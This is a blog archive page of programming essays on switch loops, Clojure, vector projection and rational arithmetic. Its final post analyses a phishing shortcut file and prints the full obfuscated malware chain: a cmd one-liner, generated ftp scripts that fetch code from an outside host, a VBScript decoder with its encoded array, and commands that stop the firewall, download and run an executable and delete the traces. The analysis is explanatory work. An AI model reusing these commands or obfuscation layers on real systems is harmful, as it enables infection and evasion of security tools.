Arcane Sentiment: January 2010

The switch loop as an expressive device

Consider the switch loop. It's a loop which iterates through the branches of a switch statement, so each iteration does something completely different:

for (int step = 0; step < 3; ++step) {
  switch (step) {
    case 0:
      //do one thing
      break;
    case 1:
      //do another thing
      break;
    case 2:
      //do something else
      break;
  }
  //maybe there's a little bit of common code here
}

It looks like blatant stupidity, and sometimes it is. An unreflective coder who hears a problem described in a way that sounds sort of like iteration may implement it as a loop, without considering whether that makes any sense.

Sometimes the same thing happens as an innocent result of maintenance. Maybe the loop did make sense once, before the switch grew to dominate its body, and no one has noticed that it no longer does.

But sometimes the switch loop serves an expressive purpose.

What do you do when a function needs to execute part of itself several times with different parameters? You make a local function, of course. But what do you do in a language like C that doesn't have local functions? Or a language like C++ that has them, but only in the awkward form of local classes?

The switch loop is one solution. It lets the shared code run repeatedly with different parameters, without duplicating that code or moving it out of its local context. Loops are C's only portable way to locally express repeated execution, and the switch loop uses one as the best available approximation to a local function.

It's not a good solution. Even in C, it's generally better to use a separate top-level function, even if it takes a lot of parameters and makes no sense outside the calling context. But to a programmer who is reluctant to create new top-level definitions (a rather common, and annoying, aversion), or who simply overvalues locality of expression, I can imagine the switch loop seeming the best of the bad options.
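
For contrast, here is roughly what the local-function version looks like in a language that has them. This is only a sketch, in Python rather than C, and report, step and the three labels are made-up names for illustration:

```python
def report(values):
    """Hypothetical function that runs one local step three times."""
    lines = []

    def step(label, transform):
        # The shared body: it stays inside report, can see `values` and
        # `lines`, and differs between calls only in its parameters.
        lines.append(f"{label}: {transform(values)}")

    step("min", min)
    step("max", max)
    step("sum", sum)
    return lines


print(report([3, 1, 2]))
```

Each call to step plays the role of one case in the switch loop, and the common code lives in the local function's body instead of after the switch.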

An Umeshism

Scott Aaronson described Umeshisms: aphorisms of the form “if you never have $problem, you're spending too much effort avoiding $problem”. He asked his readers for more, but despite their computer-scienciness, no one suggested the obvious:

If your programs never have bugs, you're being too careful.

Or, from a language viewpoint:

If your language never has runtime errors, it's rejecting too many correct programs.

There's obviously a mathematical point to this aphorism schema, but it's surprisingly hard to state it explicitly. Try it: you wind up with enough conditions of continuity and monotonicity (and maybe others I missed) to completely obscure the point. That's why we use aphorisms instead.

Belated impressions of Clojure

Clojure is over two years old, and only last week did I finally get round to writing something in it. Some reactions after writing a few hundred lines:

Error reporting is often a bane of new languages, but Clojure's is pretty good — usually you get a Java stack trace. However, I did get a number of NullPointerExceptions without stack traces.

I often made what must be a standard newbie mistake: using parentheses in place of square brackets. Some forms, like when-first, handle that well:

user=> (when-first (x nil) 3)
java.lang.IllegalArgumentException: when-first requires a vector for its
binding (NO_SOURCE_FILE:0)

But fn gives a singularly confusing error:

user=> (fn (x) 2)
java.lang.RuntimeException: java.lang.IllegalArgumentException: Don't know
how to create ISeq from: clojure.lang.Symbol (NO_SOURCE_FILE:136)

This could be easily fixed by checking the type in psig in fn's expander:

(if (not (vector? params))
  (throw (java.lang.IllegalArgumentException.
          "fn requires a vector for its parameter list")))


Accessing nonexistent fields of struct-maps gives nil instead of an exception. This is consistent with other dictionaries, but it means this error isn't detected reliably, even dynamically.

doc is the first thing on the cheatsheet, but I didn't notice it until after I'd spent much of a day manually looking things up. :/

The documentation for proxy says it “expands to code which creates a instance of a proxy class that implements the named class/interface(s) by calling the supplied fns”, which sounds complicated and potentially inefficient. So I was very suspicious of it until I realized it's just inner classes.

Something like half of my total difficulties were about the Java libraries, not Clojure.

Java's GUI libraries are not entirely easy to use, but it's still wonderful to be able to take GUI support for granted. I'm used to GUI being possible in theory but not in practice.

for, doseq and range did exactly what I wanted, with no mental effort.

dosync took some getting used to. ref, deref and alter aren't unfamiliar, but having to announce in advance that you're doing state is a little unnerving. I didn't have any problems with code that might or might not be called in a transaction, but I was afraid I might. I'm not used to keeping track of this.

The inability to nest #(... % ...) is annoying. In about 200 nonblank noncomment lines, I used it five times. It would have been seven, but two of those would have been nested (immediately, in both cases) inside others. On the other hand, there were several other 1-argument fns that could have been written with #(... % ...), had I thought of it, which I didn't, because my pet language's equivalent only does partial application.

(alter r f x) is equivalent to (alter r #(f % x)). This saves a little typing, but it's such an arbitrary convenience that I found myself worrying about whether it worked with each function's argument order.

Clojure structures are dictionaries, but this isn't important; so far I've only used them like ordinary user-defined classes whose accessors happen to have names beginning with colons. It does mean they appear in a strange place in the documentation, though.

assoc is obvious in retrospect. I have wanted such an operator for structures, and I'd probably want it for dictionaries too, if I ever used nondestructive dictionaries.

Some functions I missed: abs, expt, union and intersection (they exist in clojure.set but not in the default namespace, and they don't work on lists), member? (on values, not keys), for-each (yeah, I know, I'm not supposed to want it), and a function that returns the first element of a list that satisfies a predicate.

Function of the day: scalar resolute

The language of mathematics is old and heavily explored, so its vocabulary tends to align well with what is asked of it. But occasional holes do turn up when parts of it are borrowed into programming languages and used for purposes different from those they were developed for. I ran into one of these twice recently, for unrelated reasons, while writing vector arithmetic code. In both cases, I had vectors a and b, and needed the component of a in the direction of b (the projection of a on b, except that I needed it as a scalar). My vector library provided norm, project, unit and dot, so I had a choice of norm (project a b) or dot a (unit b), neither of which is particularly clear. (They agree only while a and b are no more than 90° apart; beyond that the dot form goes negative and the norm form does not.)

A little googling reveals that while this operation isn't commonly taught, it is known to mathematicians, who call it the scalar resolute, by analogy to “vector resolute”, which is another name for the ordinary projection operation. It seems to me that I want it considerably more often than either project or dot, so it makes sense to include it in vector libraries. Unfortunately it has no common notation, and while one could be invented (scalar-project? along?), the operation is obscure enough that its would-be users might not recognize it by any name, because they wouldn't be looking for it.

Many uses of scalar resolute also want the component perpendicular to the base vector, i.e. norm (a - (project a b)), because they're really about converting from one coordinate system to another. A vector library could directly support this with a rotate or rebase function. However, a glance through my code suggests this wouldn't be very useful, because the point of the transformation is to obtain the individual components, so they can be operated on as scalars. Producing another vector as an intermediate step would not greatly help clarity. So I think these are most convenient as separate functions:

along : (vector, vector) → scalar
along v b = norm (project v b)

across : (vector, vector) → scalar
across v b = norm (v - project v b)
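
A minimal runnable sketch of these two functions, in Python with plain tuples standing in for vectors. The helpers dot, norm and project follow the names used above but are written from scratch here, not taken from any particular library, and signed_along is a hypothetical extra that keeps the sign:

```python
import math


def dot(a, b):
    return sum(x * y for x, y in zip(a, b))


def norm(a):
    return math.sqrt(dot(a, a))


def project(a, b):
    """Vector projection of a onto b (b must be nonzero)."""
    scale = dot(a, b) / dot(b, b)
    return tuple(scale * x for x in b)


def along(v, b):
    """Length of the component of v parallel to b."""
    return norm(project(v, b))


def across(v, b):
    """Length of the component of v perpendicular to b."""
    p = project(v, b)
    return norm(tuple(x - y for x, y in zip(v, p)))


def signed_along(v, b):
    """Signed variant: dot v (unit b). Negative when v points away from b."""
    return dot(v, b) / norm(b)


print(along((3, 4), (2, 0)), across((3, 4), (2, 0)))
```

With v = (3, 4) and b = (2, 0), the parallel component has length 3 and the perpendicular component has length 4, whatever the length of b.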

Rational arithmetic is a red herring

It's a traditional question: what's 1 / 3?

Depending on the language, the result may be the integer 0, a floating-point approximation 0.33333333333..., or the exact ratio 1/3. Languages supporting the last often tout it as one of their advantages: they give correct results for integer division, unlike those other languages that only give almost-correct ones, or, worse, compute some other function entirely and call it division.
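
All three answers can be seen side by side in one language. A small sketch in Python, used here only because it happens to offer all three behaviors; the variable names are illustrative:

```python
from fractions import Fraction

as_integer = 1 // 3        # integer (floor) division
as_float = 1 / 3           # floating-point approximation
as_ratio = Fraction(1, 3)  # exact rational

print(as_integer)  # 0
print(as_float)    # 0.3333333333333333
print(as_ratio)    # 1/3
```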

I used to agree with this. Exact arithmetic is a nice feature, to be sure, and I've happily used it in a few toy programs. But as far as I can remember, I've never wanted it in a real program. Somehow, whenever I need real arithmetic for a real problem, some of the input is already approximate, so I don't mind a little more rounding. Rational arithmetic looks nice on a feature checklist, but it rarely makes my life easier.

It's also not as special as it sounds. Ratios are a simple case of symbolic arithmetic: keeping the result as something expression-like, instead of approximating it by a mere number. But division isn't the only operation that's commonly available only in approximate form. We don't expect square roots or trigonometry to be done symbolically; usually we settle for numerical approximations. Why should division be different?

While I'm complaining about rationals, I should mention a common practical problem: most languages with rationals print them as ratios, which can be quite inconvenient for humans to read. It's annoying to use a language's REPL as a calculator, and to discover that you have accidentally gotten an exact result, and must introduce some inexactness into the computation in order to be able to understand the result. (Frink can handle this nicely, by printing both the ratio and decimal forms, although for some reason this no longer works in the convenient online version.) This is a superficial UI problem, and really has nothing to do with rational arithmetic, but if it's not addressed — and it rarely is — it interferes with the utility of the language far more than mere rounding.
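
The display problem is cheap to work around when the language lets you control printing. A sketch in Python of showing both forms at once, loosely in the spirit of what Frink is described as doing above; show is a hypothetical helper, not part of any library:

```python
from fractions import Fraction


def show(q):
    """Format an exact ratio with a decimal approximation next to it."""
    return f"{q} (approx. {float(q):.6g})"


total = Fraction(1, 3) + Fraction(1, 4) + Fraction(1, 5)
print(show(total))  # 47/60 (approx. 0.783333)
```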

An onion of obfuscation

I received a phishing attack in my mail today. I wouldn't ordinarily have paid any attention, especially as it was attached to a message in Chinese, which I can't read without a dictionary and a grammar book (and not well then). But by chance it appeared to come from someone who has previously written to me in Chinese, and it was short enough that she might plausibly have intended me to puzzle it out. So the unintelligible message raised my suspicions only a little, and I looked at the attachment anyway. (Sure enough, the message turned out to be vague platitudes.)

It took a while for me to figure out that it was a phishing attack, not a virus. It was packaged as a Windows .LNK file — a shortcut — which ran a 245-character command beginning with:

%coMSpEc% /C sET s=o GAm &ECHO %V%%S%E0TW%x%^>K>w&eCHO %v%123^>^>K>>w& ...

Sorry about the StUdLyCaPs — it was apparently written like that to make it look less like code. But what does it do? %comspec% is usually cmd.exe, and cmd /c some-command runs some-command. In cmd.exe's language, & separates multiple commands to be run sequentially. So this is a script embedded in a one-line command. Case-folded and reformatted, it's:

set s=o gam
echo %v%%s%e0tw%x%^>k >w
echo %v%123^>^>k >>w
echo %v%123^>^>k >>w
echo %v%get c c.vbs ^>^>k >>w
echo %v%by ^>^>k >>w
echo %i%p%b%s:k >>w
echo %f%art c.vbs >>w
set b= -
set i=ft
set x=.com
set v=echo 
ren w g.bat
set f=st
g.bat

This writes something to w and then executes it. ^ escapes the following character, and > and >> are the same as on Unix, so the contents of w turn out to be:

%v%o game0tw%x% >k
%v%123 >>k
%v%123 >>k
%v%get c c.vbs >>k
%v%by >>k
%i%p%b%s:k
%f%art c.vbs

Substituting in the variables gives:

echo o game0tw.com >k
echo 123 >>k
echo 123 >>k
echo get c c.vbs >>k
echo by >>k
ftp -s:k
start c.vbs
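
The substitution step can be checked mechanically. A minimal sketch in Python, assuming a much simplified model of %name% expansion (case-insensitive names, unknown names left untouched); expand is a hypothetical helper and ignores the rest of cmd.exe's parsing rules:

```python
import re

# Variables set by the one-liner before g.bat runs, copied from the
# reformatted script. Note the trailing space in v and the leading space in b.
env = {"b": " -", "i": "ft", "x": ".com", "v": "echo ", "f": "st"}

# Contents of w (later renamed g.bat), before substitution.
w_lines = [
    "%v%o game0tw%x% >k",
    "%v%123 >>k",
    "%v%123 >>k",
    "%v%get c c.vbs >>k",
    "%v%by >>k",
    "%i%p%b%s:k",
    "%f%art c.vbs",
]


def expand(line, variables):
    """Replace each %name% with its value; leave unknown names as written."""
    def lookup(match):
        return variables.get(match.group(1).lower(), match.group(0))
    return re.sub(r"%(\w+)%", lookup, line)


for line in w_lines:
    print(expand(line, env))
```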

So it's writing another file and executing it, although in this case the interpreter is ftp. k contains:

o game0tw.com
123
123
get c c.vbs
by

The 123s are a username and password, which ftp will prompt for. c.vbs is (as of two hours later) still available; it contains (reformatted):

function o
  for i=1 to UBound(s)
    h=h&chr(s(i)-232)
  next
  Set qq = CreateObject("Wscript.Shell") 
  qq.run h,0
end function
s=array(245,331,341,332,264,279,331,264,342,333,348,264,347,
        348,343,344,264,347,336,329,346,333,332,329,331,331,
        333,347,347,270,333,331,336,343,264,343,264,335,329,
        341,333,280,348,351,278,331,343,341,294,341,278,348,
        352,348,270,333,331,336,343,264,281,282,283,294,294,
        341,278,348,352,348,270,333,331,336,343,264,281,282,
        283,294,294,341,278,348,352,348,270,333,331,336,343,
        341,278,348,352,348,270,333,331,336,343,264,330,353,
        333,294,294,341,278,348,352,348,270,334,348,344,264,
        277,347,290,341,278,348,352,348,270,332,333,340,264,
        341,278,348,352,348,270,333,278,333,352,333,270,329,
        348,348,346,337,330,264,295,278,350,330,347,264,277,
        346,270,332,333,340,264,295,264,295,278,330,329,348,
        264,295,278,350,330,347,264,295,278,333,352,333,270,
        270,347,348,329,346,348,264,336,348,348,344,290,279,
        279,348,351,278,330,337,332,278,353,329,336,343,343,
        278,331,343,341,279)
o
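
The decoding loop in o is easy to mirror outside VBScript, which avoids having to run the script at all. A sketch in Python, using only the first three rows of the array as a sample (a prefix, not the whole thing); decode is a hypothetical name:

```python
KEY = 232  # offset subtracted from every element in c.vbs

# First three rows of the array from c.vbs (a prefix only).
s_prefix = [245, 331, 341, 332, 264, 279, 331, 264, 342, 333, 348, 264, 347,
            348, 343, 344, 264, 347, 336, 329, 346, 333, 332, 329, 331, 331,
            333, 347, 347, 270, 333, 331, 336, 343, 264, 343, 264, 335, 329]


def decode(codes, key=KEY):
    # Mirror `for i=1 to UBound(s)`: the VBScript loop starts at index 1,
    # so element 0 of the array is never decoded.
    return "".join(chr(c - key) for c in codes[1:])


print(decode(s_prefix))  # cmd /c net stop sharedaccess&echo o ga
```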

Once the array is converted to a string, h turns out to be another script embedded in a cmd /c one-liner. This time the commands are:

net stop sharedaccess
echo o game0tw.com >m.txt
echo 123 >>m.txt
echo 123 >>m.txt
echo get e e.exe >>m.txt
echo bye >>m.txt
ftp -s:m.txt
del m.txt
e.exe
attrib ?.vbs -r
del ? ?.bat ?.vbs ?.exe
start http://tw.bid.yahoo.com/

Looks familiar, no? Once again it writes a script for ftp and fetches and runs a file. Despite being transferred in text mode, e.exe turns out to be a 52736-byte executable. I won't try to understand it, but I think it's the payload rather than another level of obfuscatory packaging, because it imports a variety of suspicious Win32 functions, including DeviceIoControl, InsertMenuA, and UnregisterClassW. I'm guessing it tries to replace something (part of a browser?) for phishing purposes. There is a suspicious shortage of strings other than the imports, though, which suggests it obfuscates its data internally. (It also calls IsDebuggerPresent, presumably to inconvenience people who are trying to watch it run.)

But never mind the binary. Count the layers of obfuscatory packaging:

Embedding a script in a command via cmd /C ... & ... & ... (twice)
StUdLyCaPs to escape case-sensitive code detectors
Assembling strings out of several pieces
Generating a script and then running it (four times)
Representing text as an array of numbers
Fetching code from elsewhere (twice)
Fetching a binary in text mode, so ordinary attempts to download it will get a corrupted version.

That's some impressive depth of defense. I'm tempted to dismiss it as a waste of effort, since none of the layers are much trouble by themselves. But it did get past my virus scanner.